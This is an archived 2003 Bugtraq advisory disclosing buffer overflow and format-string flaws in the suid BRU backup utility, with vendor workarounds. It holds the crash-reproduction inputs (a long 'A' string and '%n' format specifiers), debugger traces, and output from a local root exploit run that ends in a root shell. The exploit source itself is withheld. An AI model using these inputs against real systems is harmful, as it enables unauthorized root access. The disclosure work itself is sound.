linux, säkerhet

107901 2003-07-17  19:30  /2 rader/ KF <dotslash@snosoft.com>
Importerad: 2003-07-17  19:30  av Brevbäraren
Extern mottagare: bugtraq <bugtraq@securityfocus.com>
Mottagare: Bugtraq (import) <5622>
Ärende: SRT2003-07-16-0358 - bru has buffer overflow and format issues
------------------------------------------------------------

(107901) /KF <dotslash@snosoft.com>/----------------
Bilaga (text/plain) i text 107902
107902 2003-07-17  19:30  /150 rader/ KF <dotslash@snosoft.com>
Bilagans filnamn: "SRT2003-07-16-0358.txt"
Importerad: 2003-07-17  19:30  av Brevbäraren
Extern mottagare: bugtraq <bugtraq@securityfocus.com>
Mottagare: Bugtraq (import) <5623>
Bilaga (text/plain) till text 107901
Ärende: Bilaga (SRT2003-07-16-0358.txt) till: SRT2003-07-16-0358 - bru has buffer overflow and format issues
------------------------------------------------------------
Secure Network Operations, Inc.           http://www.secnetops.com
Anvil IDS appliance 		 http://www.secnetops.com/products
Strategic Reconnaissance Team               research@secnetops.com
Team Lead Contact                                 kf@secnetops.com


Our Mission:
************************************************************************
Secure Network Operations offers expertise in Networking, Intrusion
Detection Systems (IDS), Software Security Validation, and
Corporate/Private Network Security. Our mission is to facilitate a
secure and reliable Internet and inter-enterprise communications
infrastructure through the products and services we offer.


Quick Summary:
************************************************************************
Advisory Number         : SRT2003-07-16-0358 Product                
: Backup and Restore Utility for Unix (BRU) Version                 :
<= 17.0 Vendor                  : http://www.tolisgroup.com
(purchased EST code) Class                   : local
Criticality             : Medium to Low Operating System(s)     : *nix


High Level Explanation
************************************************************************
High Level Description  : bru has buffer overflow and format issues
What to do              : upgrade to the Tolisgroup BRU or chmod -s
bru


Technical Details
************************************************************************
Proof Of Concept Status : SNO has exploits for the described
situation Low Level Description   :

EST BRU(TM) Backup and Restore Utility is the No. 1 award winning
product  for Linux backup, having won more awards and maintained a
larger installed  base than any other commercial Linux backup
solution. A respected industry  veteran, EST has been developing UNIX
backup products since 1985.

Enhanced Software Technologies Inc. the previous vendor of BRU has
sold  its product to the current vendor The Tolisgroup.

As described by The Tolisgroup, BRU is backup science at its best. By 
exacting design, BRU solutions never abort the restore and recover the 
most data of any backup solution. 

In the past there have been a few issues with BRU reported to the
public.  One such issue (BRUEXECLOG) has prompted the vendor to
remove the suid  bit from BRU. The current Tolisgroup version of BRU
does not by default ship with the suid bit set, however we feel it is
possible users could  read old suggestions on newsgroups or the web
and chmod +s bru. The Tolisgroup has never shipped BRU with a suid
bit. In the past BRU would prompt regular users to set the suid bit
on BRU however I can not confirm that the Tolisgroup version has ever
had this behavior.

elguapo@gentoo elguapo $ bru
bru: [W171] warning - BRU must be owned by root and have suid bit set

By default BRU-15.1-3.i386.rpm has the suid bit,
BRU2000-15.0P-1.i386.rpm however does not. Both versions will prompt
a user to set the bit if it  does not already exist.

The below mentioned issues DO affect the Tolisgroup version however
if the user has not set the suid bit there is no problem. The
Tolisgroup has stated it will take measures to ensure in the future
BRU does not contain the potential to be exploited.

The 2 issues at hand can be reproduced as follows...

elguapo@gentoo elguapo $ /bru/bru `perl -e 'print "A" x 3050'`
bru: [E155] error - memory fault (SIGSEGV)

elguapo@gentoo elguapo $ /bru/bru %n%n%n%n
bru: [E155] error - memory fault (SIGSEGV)

Both issues appear to be caused by poor usage of vsprintf(). 

Starting program: /bin/bru %n%n%n%n%n
Program received signal SIGSEGV, Segmentation fault.
0x40071d96 in vfprintf () from /lib/libc.so.6
(gdb) bt
#0  0x40071d96 in vfprintf () from /lib/libc.so.6
#1  0x0805543a in step ()

Starting program: /bin/bru `perl -e 'print "A" x 3025'`
Program received signal SIGSEGV, Segmentation fault.
0x08060027 in step ()
(gdb) bt
#0  0x08060027 in step ()
Cannot access memory at address 0x41414141

These issues can easily be exploited by an attacker to gain root
access.

elguapo@gentoo tmp $ head ./0x82-BRU_overformat.c
/*
**
** backup and restore utility (BRU) local root exploit.
** Target package: BRU-15.1-3.i386.rpm
**
** bug found by "Kevin Finisterre"(KF), <dotslash@snosoft.com>.
** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>.
** My World: http://x82.i21c.net & http://x82.inetcop.org
**
*/

elguapo@gentoo tmp $ cc -o 0x82-BRU_overformat 0x82-BRU_overformat.c
elguapo@gentoo tmp $ ./0x82-BRU_overformat 1

0x82-BRU_overformat - backup and restore utility (BRU) local root exploit.
                Target package: BRU-15.1-3.i386.rpm

[*] shellcode: 0xbfffff9e [*] It's my message:
KFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFK...
KFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFthanks!!ÿÿ¿ sh-2.05b# id uid=0(root)
gid=0(root) groups=100(users),10(wheel)

elguapo@gentoo tmp $ ./0x82-BRU_overformat 2

0x82-BRU_overformat - backup and restore utility (BRU) local root exploit.
                Target package: BRU-15.1-3.i386.rpm

[*] shellcode: 0xbfffff9e, $-flag: 70, pad: 0
x82: [E155] error - memory fault (SIGSEGV)
...
[*] shellcode: 0xbfffff9e, $-flag: 73, pad: 2
x82: [E001] specify mode (-cdeghitx)
sh-2.05b# id
uid=0(root) gid=0(root) groups=100(users),10(wheel)

Patch or Workaround     : chmod -s /path/to/bru or Purchase BRU from 
The Tolisgroup.

Vendor Status           : Original vendor no longer exists. The
Tolisgroup BRU is not vulnerable by default, please upgrade.

Bugtraq URL             : to be assigned

------------------------------------------------------------------------
This advisory was released by Secure Network Operations,Inc. as a matter
of notification to help administrators protect their networks against
the described vulnerability. Exploit source code is no longer released
in our advisories. Contact research@secnetops.com for information on how
to obtain exploit information.
(107902) /KF <dotslash@snosoft.com>/------(Ombruten)